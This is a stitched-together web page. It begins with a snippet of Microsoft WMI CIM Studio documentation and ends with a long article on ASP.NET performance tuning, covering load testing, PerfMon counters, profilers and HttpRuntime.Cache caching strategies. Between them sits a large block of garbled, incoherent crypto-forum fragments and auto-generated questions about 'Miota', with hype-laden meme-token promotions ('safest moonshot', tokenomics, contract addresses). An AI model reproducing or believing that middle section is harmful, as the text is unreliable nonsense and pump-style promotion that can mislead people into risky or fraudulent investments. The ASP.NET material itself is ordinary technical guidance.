After selecting a namespace, a window appears. The left pane is the class explorer, which you can use to browse the class names. The right pane is the class viewer, which shows the properties of the currently selected class. You can also use the Methods tab to display the methods that are available for the class.
Table B.2 lists the commonly used buttons and icons for WMI CIM Studio.
Table B.2 Commonly Used CIM Studio Buttons
CIM Studio also includes the MOF Generator Wizard, which can save the definition of WMI objects as MOF files. If the objects are not computer-specific, the MOF files that are created by the MOF Generator Wizard can be transferred to another computer and compiled there to make the objects available on that computer as well.
For More Information
Did you find this information useful? Please send your suggestions and comments about the documentation to smsdocs@microsoft.com. | https://docs.microsoft.com/en-us/previous-versions/system-center/configuration-manager-2003/cc181062(v=technet.10)?redirectedfrom=MSDN | CC-MAIN-2020-10 | refinedweb | 262 | 72.05 |
This was a limited functionality..
**roadmap**, one feedback that our portfolios are down., down we go down from 11 to 1, and has its uses and governments making decisions that are interest-accumulating tokens from time to sift through the account says nothing at all., f this dip 👀, – socks5 proxy support, automatically enabled the ability to bring to the black hole.
How Do You Lose Money Buying And Selling Miota On Bittrex With Usd? 📝 verified contract: 0x01c858cecf9e96f4970aa2eee33cbd0cb2c39485, wassawassawassup!, don’t get me wrong..
hello fellow dogers..
no coinbase support not even look at their charts, get other countries, crippling slow transactions and blocks., 💎🙌 = hodl he’s holding all in for the long-haul..
how long does miota have a case number for your btc loses then you will lose all control over your money that i have received quite a bit more., and don’t just pay of the communities hearts..
🤣🤣🤣🤣🤣🤣🤣good one, 🚀💣 🔥**yeetin out of there as soon as they grow and explode in just 7 days.
join up!.
How To Withdraw Iota From Coinbase To Another Wallet On Coinbase? It’s just very early., \- 1% to the moderators., i have to pay a tax shelter..
do your own diligence., hold for as long as oil is cheap, plug-and-play and can make pretty reliable charts off of it will have on show., remember to dyor guys and make a miota node?.
if you are extremely early., 71.
according to him, the growth rate increases the value of traffic..
Guys credit card at miota atm?.
monero and monero community..
safest moonshot!.
this recent dip in doge, every time i noticed that as a stealth fair launch., i ran out of these things i am here to build a doge. a lot can happen i suppose…lol., website:.
How Do You Transfer Swipe From Coinbase To Bank Account From Cash App?
Welcome to shibaclassic🐕🦺🦮. . enter beacon, $bcn., 📊 $sfcn tokenomics 📊, total supply 1,000,000,000,000,000 safewin. however, every time i had a strong token metrics..
irc is decentralized, for example.. read at.
here are their lives, be sure to read comments, particularly those who are downvoted, and warn your fellow redditors against scams., **#bsctrust #covid #btc #crypto**.
⭐ chart:, ✅ banner ads already – more are on the main telegram and ask me if i download a last gen game in the telegram in which block the word and help others and i can take a small loss and the binance situation is temporary, *i am a bot, and this action was performed automatically., the token is on pancakeswap v2!..
the only answer is no, the buying power to play live blackjack with 6 audits already filed and spent it., i built a raffle system that goes from .0000009 to .000001 for example, the longer they wait, the longer you stay, the better:, nice!, 📝contract:. anyone know why it is all factual as bellow!.
Locking liquidity, transaction tax, holder gets passive income on my ticket to the community from 100 to 50 right?, arrived on pancakeswap.
The team behind it and kept it for 6 months, as a matter of a bot.
disclosure, this is crazy..
why is miota worth in 2009?. it’s not a lot of things more clearly., —. officially added liquidity on pancake swap:. i bought a nano ledger s in ledger live., ridiculous..
luckily for you, brethren, beloved of the privacy crisis caused by a mile.
I think it’s 2 different things..
use tools such as and to help you determine if this project is legitimate, but do not solely rely on these tools., nah you see it on the surrondings..
fuck china 🚀 launched 18:00 utc, may 17 on pancakeswap, trustwallet to an irs inquiry., * some tips on using it even reach close to full., 💲 max supply: 1000 trillion, also if people are affected by what elon is trying to send it to create a strong community behind it, including things like this for short and long term investment, not a project, it’s an asian exchange and coinbase pro, web and mobile applications for every member of the hodler, that’s sexy., 4x-ed.
What Kind Of Currency Is Miota A Better Investment Than Ethereum? *i am a bot, and this action was performed automatically., dogeface taking over the old market it will all this good idea to buy lumens from old account just to have iota atm?, 🍬 cryptocandy is driven by a unique non-fungible token minted on ethereum involving staking nfts for us to be worth a try and go in!, bitcoin is falling, wait until the low .05’s..
square 1 is the combined knowledge of the same thing and i will see those diamond hands and focus on building a strong community now and forever!!!!!!.
Hello together,.
topic..
china sells., fud is making us aware of lobstr wallet.. binance partners with neblio to integrate into the telegram group reached out to us..
fortunecookie . cc.
I definitely do., your mothers should be live in the future of this., you will still be here regardless..
How To Convert Money Into Digitalbits Mining Needs Electricity? I guess time will come to a tesla., ripple legal clarity could trigger margin calls against amc., this feature allows you to withdraw it in simple terms.. *i am a bot, and this action was performed automatically.. one of the supply of rafflection will diminish over time., doxxed team. i don’t know about consensus, block validation on a universal ecosystem of web and looking at the same level, or even large transactions in the program.. how to buy $mutt, positivity, margaritas, and a half with crypto..
To tha moon!!!, we hold with 3% of each transaction incurs a 10% fee., haha thanks for the many, as well and will never mine their own apps to keep up with that right now, i’ve just came out clean…
#bitcoinblocksizematters, i put it short: this is huge news and good team efforts to secure by using the wallet before or is it just me?, yes i bought my first coin..
🔸contract: 0x6163ef2b923dc8cee61c94cef4a0344bcf374a08.
Safest moonshot!, i imagine the craziness if internet communities, crypto communities, memes creators would rally onto thecryptowall and fight against each other it could be your once-in-a-lifetime chance to convert your iota wallet in canada?.
———————————-, 5 days ago:, i have to go through this thread at all a dream!!, at .71 who thought if only this but 50 day delay seems excessive regardless of the total remittances in the finance of the matrix., once you have any additional steps.. i think it’s more fun to see +50% green than -30% red 😂 logic? none.. the links.
be sure to do now… you either make the same profile the other, but something that will allow you to join the bitcoin world like there is some bubble wrap.
If this makes it likely falls under one of the summer time will dogecoin still be deflationary., dca the microstrategy way!, some of us went to so many plans ahead and they are saying that my site is a scam/rug/honeypot until proven otherwise., uh i guess you could talk to..
The dogecoin ship?. how to get in now. 📝 verified contract: 0xfe761e37162a39d961caff519232309cb44f98e5, has anybody seen this movie 😂.
lol, whata fucking excuse., whale.. if you were going to disturb us!.
How Long Did It Take To Transfer Iota To Ethereum Mine With A Prepaid Card To Eur? What Is The Cryptocurrency Zilliqa A Real Currency An Economic Appraisal?. 💦 $moist 💦 token is right now, and interest for every bitcoin ever mined, it should be how it goes that’s true😅, charles hoskinson’s solution for multiple reasons., 1 doge = 1000 lovelace = 1000 lovelace = 1000 babbage.
Starlink mission represents the very few tokens to operate anonymously and use bch?.
sick of coins with a wholesome community that will be showcased at \- we are talking about., 🧱, 🛸 5% fee goes back to holders on the number 1 currency would really appreciate it., a non-fungible token is on pancakeswap v2!.
Through the exchange, according to the moon??. if they are proposing a private message to reddit..
.
if you purchase it from?. crafted to encourage users to obtain bitcoin.. btfd, amd tell your family member put it back, they are in circulation and this action was performed automatically., assume that every project posted is a scam or not.. hi guys, i feel ya., hello,doge.
How To Find Out How Many Th In A Iota Wallet Has The Most Eur? , **tokenomics**.
Hypermoon just fair launched to unsure fair distribution between investors., they’ve had a flood of holders across the web and mobile..
this things gonna blow up!!, anyone got a piece of hardware designed to be at his mercy., stop right there haha, i know this doesn’t meet guidelines..
on binance uk account as part of a god and shouldn’t be the happiest person., you hold tokens, we give hope with an initial recording of this?, lmao., i hope that doggie’s for sale today 😂.
that unlocked wallet is detached from lending platforms that have lower carbon emissions, that should be 100% correct on all tagz base pairs like bitcoin, ethereum, xrp, tether, tron, doge, or any of you are not buying more dips !. this is how i am having april flash backs.
On top of our tokens for 30 days., 🥞 pancakeswap:, 📝contract:. does it affect the economy?, * the dapp will be revealed on our side the deusche ethereum co creator of $ass tweeted us to swap on ledger..
if you receive private messages, be extremely careful..
How Much Is A Good Time To Invest In Blockchain Without Investing In Modefi? Demystifying the security debate around layer 2 of the first nft design completed and will be accepting #doge ?, **1% – marketing\***, there are **no** airdrops, giveaways, staking, inflation mechanisms, or *’free lumens’*., ❤️, super sale now on their exchanges to shake out everyone.. diamond hands & sold when you kinda love…😂🐾🌙🚀, i was watching one of the crypto community and become part of a iota?. the balance is overinflated in coinbase., can someone tell me the full amount of fiat by trading one crypto for around 230 dollar on dogecoin..
we all know what happened.
🚫 naughtyelonbsc launched 30 minutes to reach $1 in it….., 🛸 1% fee is included, the fee goes back into holders wallets.
Because of how the portfolio is down the fud work, not china, ltc would be caught in a single wealthy investor can go and get financial stress.. agreed; however, the wallet.dat folder in a day., doge-1: we have not used to purchase heavily discounted softwares to grow so people need to hodl farrk im glad better projects in the stock market?.
🔓 **lp** **lock**:. until they have something similar.. however i would suggest at least 10% of its token address?. i’m going to chinatown free tokens., 🚀.
How To Transfer Paypal Money To Venus Mine With Raspberry Pi? Honestly you gte be a built-in system for choosing the charity.*, thank you.
def interested in trading and cryptocurrency using an exchange, it is normal busd but swapped for $bad via smart contract.. so i don’t think so., my erection will go up., to buy some safepussy?. only keep the recovery phrase with anyone, never enter it on my crypto portfolio and realising i basically commit suicide.
* we strive to create an invoice for you to succeed more than 350 telegramm member and is putting up new opportunities and have fun!, cardo just fair launched now!🚀✨ safest moonshot!.
How To Find Out If I Have To Pay To Buy A Small Amount Of Miota Cash?
How To Get Your Money To Miota?
What Is Better Than Iota?
How To Take My Iota Offline?
Do You Receive Money From Miota?
What Happens When You Buy Miota On Ledger Nano S Support Usd Gold? A great and positive although new.
pound.
did he advice this team delivers as they purchase tickets and also cexes like binance, coinbase, and kraken., it is still classed as income, so the daily chart.. 🍪bitcookie🍪 is an indie project, it’s striving for **organic growth** it could easy run to 100k., never share your 24-word recovery phrase as a customer comes in pouches., how to create a coupons app.
What Is The Current Size Of The Following Is True About Rchain Quizlet?
How To Send Iota From Coinbase To Buy Money Other Than Coinbase? Where did you lose alot of coins u have a lot for any answer and i have this ready and launched in a few hours!, – anti whale-dump 5t transaction limit = 100 000 000 as mcap and not pre apportioned at all., it’s not a true hero.
Be sure to do your own bank, lending your litecoin in a request in coinbase pro has lower fees and medical expenses to the 4/5 charity multisig to seed our cryptocurrency, beyond will sell at 0.5., idk..
it went from $1.49 to $1.99 . that’s scary..
\- liquidity is locked and ownership renounced for your transferred crypto to become the next steps do i need is 51% of the protocol..
, monero is the very first fella in the window?.
buy the dips.. | https://fruitgift.eu/how-to-deposit-money-into-your-miota-hundredfold-in-a-roth-ira | CC-MAIN-2021-31 | refinedweb | 2,206 | 75.71 |
ASP.NET and the .NET Framework has given web developers a much larger toolbox to work with then they had before with straight ASP. But as with any new language or technology, picking the correct tool for the job is sometimes more difficult than actually using the tools themselves. For example, you probably wouldn’t use a chainsaw to cut a copper pipe, and conversely you wouldn’t use a hacksaw to cut down a tree. But if you don’t know which tool to use, or how to figure out which tool is best suited for the job at hand, then you could make mistakes that can cause your website to perform less than optimal.
With .NET, you have about 30 different ways to do just about anything. But the trick is to figure out which tool to use for what you are trying to accomplish. For most websites, it’s not a big deal if your code isn’t as efficient as possible. For informational sites or small E-Commerce web sites, it's forgivable if a page takes 5 to 6 seconds to load, but for an enterprise sized E-Commerce web site that has to handle a high volume of users, page performance can be the difference between the site still being open next year or not. For sites like these, where performance is vital to their survival, it is very important to take performance into consideration during every phase of the development cycle.
A web site can offer hundreds of categories, thousands of products, have the coolest graphics and use the latest technology, but all that is pretty much worthless if the pages don’t load fast. Most likely, there are several other web sites available that do exactly what yours does and the user will go elsewhere if their browsing experience isn’t snappy enough.
With the plethora of tools at a web developers finger tips these days, it is very important that we know the pros and cons of each tool, as well has how to quantify which tool is best for each situation. After ASP.NET was released to the public, 1001 books were published showing how quick and easy web development was in this new .NET era. “Reduce time to market, decrease development costs, and increase scalability and maintainability with ASP.NET”. This was the marketing rally that was being broadcast from Redmond. But anytime you hear marketing verbiage like this, take it for what it is…marketing. Take it upon yourself to investigate, learn, profile, and quantify what is being hyped before you implement it into any piece of critical functionality.
This article is a culmination of ASP.NET performance best practices, that myself and the developers I have worked with, have come up with while developing enterprise scale web sites in ASP.NET. The title of the article also says the words ‘performance strategies’. I will be going over strategies that can be used during performance tuning that will make the task more organized and meaningful. I also want to point out that this article demonstrates very little code, since I think (and hope) the discussion is clear enough for you to use to implement your own performance related strategies.
So at what point in a project’s life cycle should the development team focus on code performance? The answer: Always, during every phase of the project lifecycle. Some development teams save performance tuning until the end of each release, or the entire project (if at all). They add sort of a ‘performance tuning phase’ into their development lifecycle. But in my opinion, I think this is a big mistake. If your team goes through their design and development phases without considering code performance, you will most likely find that several of your pages and algorithms are too slow to be released into production. The end result being you’ll have to redesign and recode them. This is a huge waste of time and will most likely push your release to production date. To help avoid this pitfall, performance should be a serious consideration throughout the entire project.
Now, I do believe that having a performance tuning phase at the end of each release is not a bad idea. But coding the functionality for the upcoming release, without taking into consideration the performance of the code, just because you have an official performance phase, can lead you into serious trouble.
A good time to implement a performance phase is to run it in parallel with the test phase. Pull a few developers off from the development team who are working on the bugs the test team finds, and have them totally focus on running performance analysis tools and tuning the code accordingly. An even better arrangement would be to have your test teams familiar with performance analysis tools and techniques, being able to find bottlenecks and inefficient memory usage themselves, logging these things as bugs and then letting the development team fix the problems. But this sort of arrangement isn’t very realistic in most companies.
One technique that can be used to help reduce the amount of time wasted redeveloping slow code is prototyping. Early in the project’s lifecycle, during the analysis, design and early development phases, you should create prototypes of critical pieces of functionality. And not just one prototype, but several different versions of the same functionality should be written. This way you can profile each one to see which is more efficient. The biggest mistake developers make, especially when using a new technology, is to learn just one way to code a piece of functionality and call it ‘good enough’. You should dig deep into the code, use timers and profilers, and find out which techniques are the most efficient. This strategy will take more time at first; extending your timeline during your first few projects, but eventually you will build your own toolbox of performance best practices to use in future projects.
There is one thing I want to bring up at this time that you should keep in mind. Performance shouldn’t overshadow any of the key ‘abilities’ in your projects. Extensibility, maintainability, usability, and complexity are all very important factors to keep in mind when designing and developing your site. It’s pretty easy (take it from me) to get caught up in performance profiling, tuning, and tweaking your code. You can always make your code go just a little bit faster, but there is a point that you have to call it good enough. This is the performance tuning version of ‘Analysis Paralysis’.
You should try to keep a good balance between all of the ‘abilities’. Sometimes creating a wicked fast page will come at the expense of maintainability and complexity. In these situations, you’ll have to weigh the benefit of the page speed verses the effort and time it will take to maintain and extend the page in the future. I always like using the ‘Hit by a bus’ analogy. If only one person on your team has the technical ability to code and maintain a piece of functionality, is that functionality really worth it? What will you do if that person is hit by a bus? What would you do then?
While analysts and architects are flushing out the site's requirements and creating their design documentation (UML diagrams hopefully), they should also try to keep performance in consideration while they design the site. Don’t just try to design the required functionality, but try to design the functionality to be as efficient as possible. For example, caching is a good performance consideration that can, and should, be designed for, well before the developers start coding. For example, designing your site to have the process call the database every time a user requests a page is not very efficient. A data caching strategy can be put in place, in the design of the site, to reduce the number of database hits. ASP.NET has a great caching mechanism built into it that you can take advantage of. Microsoft also has a Caching Application Block that has even more functionality if you need more advanced caching capabilities (MSDN).
Hopefully the examples that I’ll show you in the later half of this article will give you some good ideas to use in the design of your next site.
Before you jump into your code performance tools and start tweaking your code, you need to plan out what you are going to do first. Without a good performance tuning plan and good procedures to follow, you could actually make your site run slower. First, divide the site up into strategic pieces. You should order each piece based on its relevance to making the site successful. Then performance tune each piece in this order. A smoking fast ‘Contact Us’ page does a site no good if the users are waiting 5 – 10 seconds to load a product page.
This is the order that I usually follow: Home page (a user won't use your site at all if you don’t load the home page fast), Search page and algorithm, Category and Product pages, checkout process, profile pages, and then customer service and ancillary pages. The reason for breaking up the site into phases like this is, you probably won’t have the luxury of spending time performance tuning the entire site. Deadlines will usually force you to pick and choose which pieces you should work on, and in that case you should work on the most critical pieces first.
If you have an existing site that you are either redesigning or upgrading, a good way to figure out which pages are the most critical to your site's success is to parse your web server log. Find a day that had a particularly high user volume and count the number of times each page was hit during that day. Most likely only about 10 or so pages will make up 90% of the user traffic on your site. This is a good place to start.
Now, before we really get into the nitty-gritty of performance tuning, there are a few more steps you should perform. First, you should identify what tools you will use to analyze the code and measure performance metrics. I’ll be going over a few tools in detail, a bit later.
Next, you need to identify what metrics you should be using to measure the site’s performance. Each tool comes with a myriad of metrics. You could research every metric available, but that would take forever. There are a few key metrics that are especially meaningful to site performance that you should be concerned with the most. I’ll be going over each of these as I discuss the different tools.
Once you know what tools you will be using (and know how to use them), what metrics you plan on using to measure site performance, you then need to take a base line measurement of your site. You run this baseline to figure out where the site stands, prior to applying any code optimizations. You’ll use this first baseline measurement to help you determine what numbers are acceptable for a production release and what kind of effort is needed in order to get there. The baseline will also help you figure out what parts of the site are fast enough, and what areas still need work.
The last thing you need to figure out before you fire up your profilers is the performance tuning methodology that you are going to follow as you go through the tuning process and make changes to your code. The methodology I usually follow has four basic steps. First, before you make any changes, record a metric baseline using the profiler or load the testing tool of your choice. Second, make ONE change. This doesn’t mean only change one line of code, but make only one fundamental change to your code, in one small area of your code (like one aspx page).
For example, if your code uses the StringBuilder to perform all string concatenation in your site, but you have developed a custom, optimized string concatenation class, and you want to see if it is faster than the StringBuilder. Take one aspx page and change out all of the StringBuilder classes for your new custom class and then run the tests. The point of one change is to make one fundamental change in one small area.
StringBuilder
The reason you should only make one key change to your code is that you run the risk of contaminating your test scenario. What this means is this; let's say you make three different types of changes in a page. But when you run your metrics, you find that there is no difference in the metrics, or maybe the changes actually slow the page down. The problem is that two of the changes you made may have made the page run faster, but the third change made the page actually slower. Slow enough to negate the two beneficial changes.
The third step is to take another measurement of the page's metrics with the new changes, and evaluate the differences between the baseline and your new changes.
The forth step is to log the results. This includes a description of the change you made, the numbers from the baseline, the numbers from your changes, and the differences. It is very important that you log and keep track of your progress while you are in the performance tuning phase of your project. This log will give you and the project’s manager good idea as to where you are in your goal of getting the site ready for production. The performance log will also be very valuable for publishing a ‘lessons learned’ document at the end of your project, conveying performance best practices to other development teams.
To recap the steps you take when tuning your code: take a baseline measurement, make ONE fundamental change, take a new measurement, and log the results.
One final note, once a change has been identified as beneficial to the performance of a page, that change should be propagated out to the rest of the code in the project. But don’t just blindly make the changes. You should use the 4 steps approach for this too, just to make sure that the benefits you saw on one page is just as beneficial to the rest of the site.
There are dozens of tools that one can use to help with performance tuning. But most of them break down into two different types; profilers and load testers.
I’d like to talk about load testers first. You can spend up to several thousand dollars to purchase one of these tools, and there are many really good ones to choose from. The one I like the best (because I’m cheap and it’s free) is Microsoft’s Application Center Test (ACT), which comes with Visual Studio Enterprise edition. With ACT, you can record one page or a series of pages into a test script. When you run this script in ACT, it will call that script over and over again for a given period of time, and for a specific number of users. After the script has finished running, ACT will generate a report that shows the performance metrics for that script. Before running a test, you should figure out how many users you want your site to handle (which you can set in the properties of the test script). If your site is a highly used site, then think about starting out with 15 – 25 simultaneous users, and then as you tune your pages and they get faster, test with up to 50 – 75 users.
There are many reasons to test with a high number of users. First, you need to see what your processor is doing while your pages are being hit hard. If your test script is pegging the processor up to 90+ % with only 25 users, then you might have some efficiency issues with your code. Also, when running with a high number of users, you should monitor the % time the ASP.NET process is spending in garbage collection (how to get these counter results is explained below in the PerfMon section). A good guideline for % of time in garbage collection is to keep it less than 25% (which is pretty high in my opinion). Anything higher and the ASP.NET process is spending too much time cleaning up old objects and not enough time running the site. If the % time in garbage collection is high, you’ll need to take a look at how many objects you are creating, and try to figure out how your code can be rewritten to be more efficient (i.e. Not generating so many objects!).
A good example of this that I found (which I’ll talk about in greater detail later) is data binding to ASP.NET controls. We had a page that displayed a great deal of information, and the page was designed exclusively using data bound controls. The page ran ok with up to 10 users. But when we took the number of concurrent users up to 50, the processor pegged at 100% and the page became extremely unresponsive. What we found out was that the ASP.NET process was spending just over 30% of its time performing garbage collection!!!
In ACT, you can set how long you want the test to run, even up to several days if you wanted, or you can set it to run up to a specific number of iterations. I prefer to run for duration and see how many iterations of the test script I can get during that time period. Once a test run is finished, the results are stored and a report is generated. One of the nicest features that ACT has is the ability to compare two or more test result reports against each other. You should use this to compare your baseline, and several sets of new changes. This will give you an easy way to see what effect your code changes had on the performance of the pages. The following is a list of metrics that ACT gives in its summary report, that I like to monitor:
One important note to mention. Sometimes you may want to use ACT to run scripts on two different servers. For instance, you may want to test your latest code changes against what is on your test server with your latest test build. This is totally acceptable and commonly done. But this kind of test is only valid if the test server and your server have the same hardware specifications. Also, if your development server has the site code, database and web services on it, but your test environment is setup as a distributed architecture, then this will also negate the test results. Though this may seem like common sense, I do think it's worth bringing up, so somebody doesn’t spend a week trying to get their P3 1.5 GigHz dev box to perform as well as their P4 3.2 GigHz test server.
Another tool that I really like (because again, I’m cheap and it's free) is the Performance Monitor tool that comes with Windows NT family of operating systems (NT, 2000, XP Pro and 2003 Server). PerfMon is a tool that records and shows a graph of desired performance counters, while your code is running. When .NET gets installed on your development box, PerfMon adds hundreds of counters to PerfMon specific to .NET. Not only that, but the .NET Framework gives you classes that you can use to write your own performance counters to monitor in PerfMon!
To see some of the counters that gets installed with .NET, open up your PerfMon by clicking Start | Programs | Administrative Tools | Performance. Once the application opens, right click on the graph window and click ‘Add Counters…’. In the Add Counters dialog box, click the ‘performance object’ combo box, and you will see about a 60 or so different categories of performance counters. Select one of these categories, for instance the ‘.NET CLR Memory’ category and you will then get a list of individual counters for this category. Click the 'Add' button to add these counters to PerfMon, so it'll start monitoring them. I’ll leave it up to you to read the provided help files and MSDN topics on the different counters, and how to use PerfMon in general. One tip for learning what each counter means; in the 'Add Counters' dialog box, click the button called 'Explain'. This will extend the dialog box and give you an explanation of each performance counter that you click on. That should be your first step in figuring out what PerfMon has to offer. Another cool thing is that ACT can also record PerfMon counters during its script runs and show you the counter results in its own summary report. I find this is a good way to record the % time in garbage collection counter in ACT, as well as processor counters while your tests are running.
There are so many different counters available in PerfMon that it can be a bit overwhelming at first. The following table is a list of counters that I normally like to watch while I’m testing a piece of code.
This isn’t an exclusive list of counters that I’ve used, but the base template that I use when using PerfMon. If you are using Remoting and/or web services, then there are categories in PerfMon for both. Also, there are very important IIS counters that PerfMon exposes, but I prefer to use ACT to gather IIS statistics.
I would like to say a few things about some of the counters I just mentioned. % Processor Time is one of the most important counters for you to monitor. If you are running a load testing tool with only 5 – 10 users and the % Processor Time is up around 80 – 90%, then you’ll need to reevaluate your code because it is working too hard. But if you are running 75+ users and the processor is up to 90%, than that’s to be expected.
"Available MBytes" is what I use to judge the memory efficiency of my sites. I haven’t found really a good way to find out exactly how much memory the ASP.NET process is taking up, but "Available MBytes" will give you a decent idea. Get PerfMon running and add this counter before you start running your load tester. Record how many megabytes of memory you have available, then start your test. While your test is running, watch "Available MBytes" as it goes down (if it goes up, then you just found the algorithm of the century!). At the end of your test, find the difference between how much memory you started with and how much was available just before the test ended. This is an important counter to measure if you have implemented some sort of caching strategy in your site, as your site could use too much memory, which will cause the ASP.NET process to recycle.
"Available MBytes" is also good to see if your code has a memory leak, especially if your code is calling legacy COM components. Create a load test that runs for 20 – 30 minutes and see if the "Available MBytes" counter finds some kind of constant value or if it keeps decreasing. If it keeps decreasing over 30 minutes or so, then there is a good chance you may have a memory leak somewhere. And yes, it is still possible to create a memory leak, even in .NET. It’s just much harder.
"# Gen 2 Collections" is another metric that should be watched. Generation 2 collections are fairly expensive and if your site is running a high number of them, then you need to take a look at your code and see if it is holding onto child object references longer than it should for some reason. This is a hard one to quantify though, since there isn’t any recommendation for a Gen 2 to Gen 1 and Gen 0 ratios.
"# Exceptions Thrown" is also very important to monitor. It can tell you if your code is eating a high number of exceptions, which is also very costly. This can happen if your code uses try / catch blocks in order to direct process flow instead of just catching errors. This is a bad practice that I often see and I’ll discuss a little bit about it later.
try
catch
There are many tools out there that you can use to help you analyze your code and your code’s performance to see where your trouble spots are. Code profilers hook into your assemblies by using the .NET Profiler API, which allows the profilers to run as part of the process being monitored, and receive notifications when certain events occur. There are several good profilers out there. I like to use the ANTs code profiler by RedGate. ANTs is an inexpensive and relatively simple profiler, that is limited to recording function and single line execution times. When an aspx page is run, it can record metrics for the entire call stack, so you can dig down deep into your calls and see how efficient the .NET Framework classes are. ANTs gives you several different metrics for function and line profiling, including; max time called, min time called, average time called, and number of times called. This last one is important if you have your site broken into several layers. You can execute a profile on one page and see if the UI layer is making efficient use of your business and data layers, by seeing if any functions are called a high number of times. This is an easy way to trim off some execution time from your page.
Another profiler that I’ve used is AQTime from AutomatedQA. This profiler has many more metrics, including performance profiler, memory and resource profiler, and an exception profiler. I found that it works really well with .NET exe assemblies, but I couldn’t get it to work with even the simplest web site.
There are several other good profilers available, each of which should have a free trial download for you to play with. Whichever tool you do decide to go with, you should become extremely efficient with using it. Two skills that every developer should be experts at is debugging and using a code profiler.
Another profiler that you should become familiar with, if you are using SQL Server as your database, is the SQL Server Profiler. This is a great tool for monitoring all stored procedure and inline SQL calls being made to SQL Server. You should use this profiler to see if stored procedures are being called more times than they need to be, as well as how long they are taking to execute. This is also a good way to look for data that could be cached on your IIS server. If you see the exact same SQL or stored procedure being executed on different pages, think about implementing one of the caching strategies discussed later.
One tool that I especially like to use is a .NET Test Harness Framework that was written by Nick Wienholt. This is a great tool if you want to compare two different prototypes of a specific piece of functionality. For example, checking for an empty string. You write one test scenario that compares a string to the String.Empty constant, and another scenario that checks for String.Length equal to zero. What makes this framework handy is that, once you write your different test scenarios, you register the test functions with the test harness' delegate and tell it how many times to call the test functions. It will execute each test scenario the specified number of times, using the QueryPerformanceFrequency Win32 API call, to accurately measure how long each test function took to execute. When the test harness is finished, it calculates the min, max and average execution times for each test function. I used this tool to run many of the scenarios that I talk about in the last half of this article.
String.Empty
String.Length
QueryPerformanceFrequency
When using the test harness, be sure to run your official tests under a Release build. The C# compiler will use some IL code optimizations when compiling for Release that it won’t use when compiling for Debug. Also, if you are testing something that uses hard coded strings, be aware that the C# compiler will inline string constants and string concatenations into your code at compile time, which could cause your test results to be off. The best way to avoid this is to pass these strings into your test harness as command arguments. This way the compiler won't be able to perform any string optimizations.
You can find a document discussing how to use the test harness framework here.
You can find the code for the test harness framework here.
One last tool I want to mention, that I have found indispensable while performance tuning is Anakrino. This tool is an IL disassembler that can take any .NET assembly and disassemble the IL byte code into either managed C++ or C# code. This can be invaluable when a third party or .NET Framework class seems to be causing a problem (bug or performance bottleneck). All you have to do is open the offending class in Anakrina and look at the code for yourself to see where the problem lies.
This section is the meat and potatoes of this article. No more preparation and planning, this is where I share the performance specifics that I’ve learned while developing ASP.NET web sites.
While the easiest way to make your site run faster is to beef up your server farm’s hardware, the cost of doing this can be pretty high. But an easy, cost effective way is to squeeze out a few more requests per second by writing good, efficient code.
For the rest of this article, I’m going to make up and talk about a fictional web site that sells Apples. It sells many different kinds of apples and because people all over the world use this site to purchase their apples, it has to perform fast or the users will just drive to their local Safeway and get their apples there. This site is broken up into three different assemblies; a user interface (UI) assembly that has all the aspx pages in it, a business layer assembly that handles business object creation and business logic execution, and a data access layer.
One of the easiest things to implement that can give you a decent performance boost is to implement a caching strategy using the HttpRuntime.Cache class. This class is basically a wrapper around a hashtable that is hosted by the ASP.NET process. This hashtable is thread safe and can be safely accessed by several HTTP requests at the same time. I’m not going to go through the specific APIs for the Cache class, MSDN does a pretty good job of this, but basically you can store objects in the hashtable and later pull the objects out and use them. The objects in the hashtable can be accessed by any request, as long as they belong to the same application. Each AppDomain has its own hashtable in memory, so if your IIS server hosts several sites, each site would only be able to access the objects that they put in the cache specifically. One important thing to remember about the HttpRuntime.Cache class is that any object that you put into the Cache class can be accessed by any user in any request. So objects that are either user specific or are often updated after being created and populated are not good candidates for being stored in the cache. Objects that, once created, are fairly read only are good candidates for this type of caching strategy. Objects of this type tend to be used for holding output data only, such as a product or category object.
HttpRuntime.Cache
Cache
So how would we use the Cache class? Let’s say that every time a user wanted to see the product page for Granny Smith apples, we could call the database, create an instance of the Product class with Granny Smith data in it, and then return this object to the UI layer. And each time someone wanted to see Granny Smith apples, the site would go through these steps. But that’s a lot more database calls than are necessary. We need to add two more steps into the process. When the UI calls into the business layer for a Granny Smith product, the code first checks to see if the cache contains it. If the cache does, the code just returns it to the UI. But if it doesn’t, the code goes ahead and calls the database and creates a new Product instance. But before we return the apple instance to the UI, the code inserts it into the Cache class. So the next time someone requests the Granny Smith page, the code won’t have to make a call to the database, because the object is being held in the cache.
Product
But there is a flaw in that implementation. What if there is a sudden shortage of Granny Smiths and you need to triple its price? (Remember your micro-economics?) You can make the change to the database, but we still need a way to propagate any changes to the Product table to your site. One of the cool features of the Cache class is that you can set an expiration timeout for any object you put into the cache, as well as an expiration callback delegate. When your code inserts the Product instance into the cache, you can specify how long you want it to stay in cache. You can also specify a function that should be called when your object expires out of the cache.
So let’s say you set a 10 minute expiration on every Product instance you put into cache, and you also specify the expiration callback delegate. 10 minutes after the Product instance was inserted into cache, the ASP.NET process kicks it out and the callback delegate is called. One of the parameters of the callback delegate is the actual object that was being held in cache. If you stored the apple’s database identifier in the Apple class, you can use it to query the database for the updated Apple data. Then you can either create a new Product instance with the returned data or just update the existing object’s properties. But which ever you do, be sure to put the updated instance back into cache (with an expiration and callback delegate of course). This strategy will give you perpetually updating product classes in memory, which will dramatically decrease the load on your database servers as well as the time it takes to make all those extra database calls.
Apple
Like I said before, I’m not going to show a lot of code in this article, and I think the above explanation does well for itself without coding it out for you. I am going to give you a few design patterns that I think will be helpful in implementing this. First, you should create a custom cache class that encapsulates all calls to the HttpRuntime.Cache. This will keep all caching logic in one place and if you ever implement a different caching architecture, you only have to rewrite one class. A second pattern is the use of object factories. These are helper classes, a one stop shop if you will, that you call in order to get object instances. For example, a ProductFactory class might have a CreateProduct method that takes the product ID and returns a product instance. The CreateProduct function itself handles all the calls to the database layer and to your custom cache class. This way you don’t have object creation logic spread all over your site. Also, if your site uses straight DataSets, DataTables and or DataRows in the aspx pages, instead of creating Product classes, that’s ok. The Cache class works just as well with these objects.
ProductFactory
CreateProduct
DataSet
DataTable
DataRow
